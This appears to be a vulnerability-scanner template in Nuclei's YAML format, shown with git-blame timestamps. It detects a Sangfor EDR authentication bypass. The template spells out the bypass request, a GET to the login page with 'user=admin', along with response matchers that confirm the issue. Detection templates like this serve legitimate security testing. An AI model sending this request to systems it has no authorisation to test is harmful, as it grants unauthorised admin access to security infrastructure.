2021-04-22 09:07:32 +00:00
|
|
|
id: sangfor-edr-auth-bypass
|
|
|
|
|
info:
|
|
|
|
|
name: Sangfor EDR Authentication Bypass
|
|
|
|
|
author: princechaddha
|
|
|
|
|
severity: high
|
|
|
|
|
tags: sangfor,auth-bypass
|
|
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/ui/login.php?user=admin"
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 302
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- "/download/edr_installer_"
|
|
|
|
|
part: body
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- 'Set-Cookie=""'
|
|
|
|
|
part: header
|
|
|
|
|
negative: true
|
2021-07-21 12:44:42 +00:00
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- 'Set-Cookie='
|
|
|
|
|
part: header
|
